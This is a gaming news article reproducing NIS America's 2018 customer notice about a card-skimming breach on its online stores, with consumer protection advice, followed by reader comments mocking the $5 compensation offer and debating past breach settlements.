Publisher NIS America is contacting customers to inform then that the company's online stores have been hacked and user information - including credit card details - has been stolen.
The attach occurred sometime between January 23rd and February 26th on the stores store.nisamerica.com and snkonlinestore.com. The data breach allowed the hacker access to customer information for all new credit card orders placed between those dates, including name, address, credit card number, expiration date and CVV security code, and email address. Those whose used PayPal to pay for orders did not have their payment information or login details exposed during this hack.
NIS America is sending out codes which entitle affected users to claim $5 off their next purchase.
Here's the email that is being sent out to customers:
We are contacting you to notify you of a data breach which occurred between January 23rd, 2018 and February 26th, 2018 on online stores owned and operated by NIS America, Inc., including store.nisamerica.com and snkonlinestore.com. This data breach allowed an unauthorized party to access customer payment and address information for new credit card orders placed between these dates.
Our customers are our top priority, and it is our responsibility to provide a safe and secure environment for you to shop online with confidence. We would like to inform our customers of what happened as a result of this breach, the steps we have taken to resolve it, and what you can do to protect yourself.
Am I impacted by this?
Yes. Your personal information, including your payment information, may have been compromised. Personal information, including payment information, was taken directly from new orders placed using a credit card between January 23rd, 2018 and February 26th, 2018. Orders placed using PayPal during this time period did not have their payment information or PayPal login information skimmed by this process. Orders placed before this time period were not impacted. Based on our information, we have determined that your information may have been affected by this.
What happened?
On the morning of February 26th, we became aware of a malicious process that had attached itself to our checkout page. This process was being used as far back as January 23rd, 2018 to skim personal information provided by our customers during checkout after they placed an order at our store.
After entering their billing, shipping, and payment information, the customer would be temporarily redirected to an offsite web page not owned or operated by NIS America, Inc. This malicious process would record the information provided by the customer during the checkout process, including credit card information, billing address, shipping address, and email address. Afterward, the malicious process would return the customer to the NIS America store page to complete their transaction.
Transactions conducted in this manner were still successfully completed on the NIS America store pages. However, the payment information recorded by the malicious process could be used for fraudulent charges in the future. Fraudulent payments could be attempted at any storefront that accepts credit card payments, not just NIS America, Inc. store pages.
What information was involved?
The skimming process had access to all information provided by the customer during checkout, including their name, address, credit card number, expiration date and CVV security code, and email address.
We do not collect Social Security numbers, and there is no evidence that any payment or billing information provided prior to January 23rd, 2018 was compromised.
What actions were taken as a result of this issue?
Once we became aware of this issue, we immediately took our store pages offline to prevent any further breaches. After taking our store pages offline, we scanned all our processes to determine the exact point of entry, as well as determine when this change occurred on our online stores. We have taken steps to solve the issue that resulted in this breach, along with several other steps to improve our site’s security.
What you can do to protect yourself:
-Check your bank or credit card statement for suspicious activity, or charges that you do not recognize. If you see any fraudulent or suspicious charges, please contact your bank or credit card’s fraud department. It is possible for any information gathered by this malicious process to be saved and used at a later date, so regularly checking your statements for unusual activity is the best way to ensure your card is not being misused.
-Contact your bank or credit card company to cancel cards you feel may be impacted by this issue, and request a new card. If you request a new card, please remember to update any automatic payments that may attempt to draw from the old card. If replacing a card, you will need to update preorders for future products provided by NIS America, Inc.’s online stores. For secure payment, we can send invoices via email directly from PayPal, which can be paid with or without a PayPal account. PayPal information was not breached during this event.
-Check your credit report for any anomalies. The Federal Trade Commission recommends http://www.annualcreditreport.com/ . Additionally, you can place a free, 90-day fraud alert with one of the three major credit bureaus and/or place a credit freeze on your file to restrict access to your credit report by other parties. For more information, please visit https://www.identitytheft.gov/Steps
-If you have a user account on one of NIS America, Inc.’s online stores, please know that we do not store payment information within these accounts. User accounts are used primarily to track past orders and gain reward points. Data for past orders is stored securely, and will only show the last four digits of a credit card, and will not show the CVV security code or expiration date. It is still recommended to change the password of any accounts you have with a store operated by NIS America, Inc.
-If you encounter any warning messages from your web browser that you may be proceeding to an unsafe page on our site or any other site, stop what you are doing and contact the site’s operators.
-Keep an eye out for fraudulent emails, texts, phone calls, or fake websites trying to get your personal information. Never give out private or personal information, including financial details, unless you can verify the identity of the person or organization contacting you. Don’t respond to texts or emails coming from a contact you don't recognize, and don’t click on any links they provide. Instead, if you need to check your account, type the site address you want to visit into your browser and securely log into your account.
-NIS America will never ask you for your personal information, payment information, or password via email, unless contacted to do so by our customers via our customer support channels. Updated payment information is only collected through PayPal, using either an invoice or direct payment.
We know that this issue and the steps needed to resolve it can be frustrating. We share these feelings, and we pledge to do our best to get this issue resolved, and prevent it from happening again. At this time, we can say that we have identified the issue, removed it from our website, and taken steps to prevent this issue from recurring, as well as added new security to our online stores. We would not be reopening our online stores if we did not feel confident that they are a safe place to shop.
We are committed to earning back your trust and confidence, and we hope to have the opportunity to serve you again soon. We will be sending out codes for a $5.00 discount on your next purchase from our online store to those impacted by this issue within the next few days. We understand that this is a small token, but we hope it will show our commitment and appreciation of our customers as we begin to regain your trust.
If you have any questions or concerns, please feel free to contact us and we would be happy to assist you in any way that we can. We can be reached anytime at [email protected]
We are determined to provide you with a safe and secure shopping experience going forward. We hope to see you on our online stores again soon.
Comments (51)
Does this include the Europe store?
"NIS America is sending out codes which entitle affected users to claim $5 off their next purchase." AHH HA HA HA HA HA. Nope. "Sorry that shopping with us is so unsecure and opens you up to fraud. Please buy more"
At the very least, they're not trying to hide it...
"We are committed to earning back your trust and confidence"
They think that costs $5. LMAO
@SLIGEACH_EIRE This will be for physical copies - not digital games. Those are sold via the eShop.
@Damo Oh, ya, duh! Silly me. Sorry. Thankfully I've never bought anything from their store as I find them expensive especially their Collector's Editions.
@GrailUK That is something they should atleast say if it was or not.
Wow, a whole $5 code for the hassle of canceling your credit card.
Sigh... it's 2018. There is absolutely no valid reason for any online store to be personally handling or storing credit card information. None. And this is why they absolutely should not be.
Lol 5 bucks? Give me all the stuff for free.
@Damo Kirby star allies has demo in eu uk eshop
5 bucks is better then nothing. When this happened to Gamestop during the switch launch they didn't offer anything.
Who is NIS?
Is that $5 compensation an early April fools joke or what?
That isn't covering the slightest all the hassle one has to go through canceling their credit cards and issuing a new one and the email spam that one will have to endure the coming time.
Not to mention full name and address details compromised as well.
So what about identity theft protection for ones affected?
@riChchestM But but but you get 5 dollars off!
I wouldn't have bothered with the five dollars. That seems more of an insult than offering nothing.
This needs half price games or something similar.
This is why I use temporary disposable credit cards to shop online. It's a bit more hassle but when stuff like THIS happens I know I'm not in trouble.
$5... maybe for AngryJoe. In all seriousness though, they should've given games digitally to the ones that is affected that doesn't use PayPal. I'm just sitting here being dumbfounded that they wanted to earn back people's trust in the store site by giving a crappy compensation. Even if it's something rather than nothing, the amount of work for the consumer is already stressful as is and that $5 is more like an insult than anything.
Wow... I placed my Ys8 pre-order on Jan 18th so I guess I am fine.
I never order anything from them, I buy their games through retail or secondhand shop or the eShop.
NIS America can't seem to catch a break these days.
Although most of the issues are self-inflicted... (trying to cut corners on publishing, censorship in localization, questionable ordering protocols, etc.)
1) Please don't handle billing information yourself in this day and age
2) Please don't store CVV. Negative consequences FAR outweigh the (potential) benefits
@Raylax - And who exactly should be? A Bank? With multiple outlets of personal online stores? Ones that are oft attacked as well?
@Jeronan
It's not "compensation" it's a gesture of good will.
Most companies... they don't give you squat. So criticizing the ONLY company that's ever given me ANYTHING for compromised data... seems misguided. It may not be alot (And it's not) but it lets me know they are sincere. Because that $5 adds up when you're dealing with 100k customers.
Fyi yes, this affects me and I got the email. I made 2 purchases between these dates.
Guess it's a good thing I didn't buy that wall scroll the other day.
Their public statement should have been
"Sorry dood!"
@JaxonH exactly 👍
5 bucks for my credit card information? That’s an insult. I hope they crash and burn
So our credit card info was worth $5? (I mean, that might be my current cash balance due to the Switch killing off the rest of my budget but) that's a huge slap in the face.
@JaxonH Bullocks!! Other companies were forced to give Identity protection, when credit card and personal info was stolen!
And those companies that tried to hide it, paid dearly later on with class action lawsuits and ended up spending even more with court costs, identity protection, etc!
5 bucks discount on a product in their store that was hacked is a complete insult! Are they trying to be funny?
That doesn’t cost them anything, since they not giving you the 5 bucks. They just discount it on a product in their store.
@Jeronan
No. Letting the info get stolen in the first place was the insult.
Actually offering free money to 100k people regardless of whether they were for sure affected or not... That's commendable.
Did I get anything from Sony when they were hacked? Nope. Did I get anything from Gamestop? Nope. Have I ever gotten anything from anyone...
Nope.
They should have sent you nothing. Then you would actually be complaining LESS because it's just another instance of another company with a security breech.
@Yasaal
No. That's not what it's worth. Obviously.
They're not paying you for what they think it's worth. This is not compensation. This is a good will gesture. Probably set aside a million dollars and dispersed evenly to everyone (which is a small amount per person).
Your CC company, THEY are the ones that will pay you what it's "worth" thanks to their fraud protection. This is just a "We're sorry" And it's dang well more than anyone else has ever done.
@JaxonH ehh what??? Maybe you should get your facts straight. Sony end up paying everyone that was affected!
They also had to pay a big fine for hiding it from their customers for so long that people got their identity stolen!
Sony had to pay up to 2500 dollars for each victim that got their identity stolen.
Credit card has froud protection, but your personal information is not!
@Jeronan Link with proof. Provide it. You make the claim, you provide the evidence.
@Jeronan
I sure as heck got nothing. I can ASSURE you of that.
Five bucks?! They should be paying off my home loans! My life is ruined!
The reactions in here. NIS should have just kept the five bucks. People would be fussing anyway. At least it’d be more about the part that’s actually important.
@What_Sthat No one cares about 5 bucks credit in their store, where most wouldn’t want to buy stuff anymore anyway, when all their personal info, email and credit card info was stolen!
I sure wouldn’t do any business with them anymore, so that 5 bucks credit they could shove up their rear end.
What I would more care about if I were a victim is Identity protection!
@MegaVel91 Sony lost the Class Action lawsuit in the US. So everyone in the US that was affected could choose up to two free games, everyone else that settled before already got a free game.
I live in Europe and was not affected by the hack, but I did get compensated for that very long PSN outage. Everyone got compensation for that.
Everyone that had their info stolen due to the hack, was also offered a year free Identity theft protection.
I got that actually offered, since my info on SOE’s servers, which were part of the hack did get stolen there. Luckily my info there was outdated, so I didn’t care, but at least did get some compensation from SOE as well.
PS. There is even a whole wikia page with all information about it:
https://en.m.wikipedia.org/wiki/2011_PlayStation_Network_outage
Jeeeesus. Five dollars. IF you come back and buy more [STUFF] from us after we literally handed your credit card number to criminals.
I'm sympathetic to the challenges of conducting online business but HOW do you think that's a smart response?
Glad I've never bought from them, but dang...this crap is getting out of control.
Stuff like this is why I don't save credit card information on shopping sites that aren't Amazon.
@Raylax Correction, Credit card detailsarenot stored on NISA sitebut as it's clearly stated that customers were redirected to a site that lookslike NISA on site where the customers were unwittingly given out details to the hackers then led back to NISA's own site.
Long story short there credit car details were not stored on NISA's site.
@JayJ Yeah, it's always worth the (minor) hassle of entering your data each time so this kind of thing has a lower chance of occurring.
@TommyTLG Nippon Ichi Software [America].
I love Nippon Ichi Software but I have never bought anything directly from them. I wasn't even aware they had their own store.
thats sad dood.
Ordered SNK HEROINES Tag Team Frenzy Diamond Dream Edition from the SNK Online Store on January 13th, via Paypal. Made it by 10 days even.
That’s really a poor compensation, dood. They could’ve at least given out some sardines.
@JaxonH True. But I doubt the trouble we had was worth a mere $5... It felt like they were saying the error was worth $5... Gimme $60
@Raylax they aren’t storing it. This was a man in the middle hack according to the text.
Tap here to load 51 comments
Leave A Comment
Hold on there, you need to login to post a comment...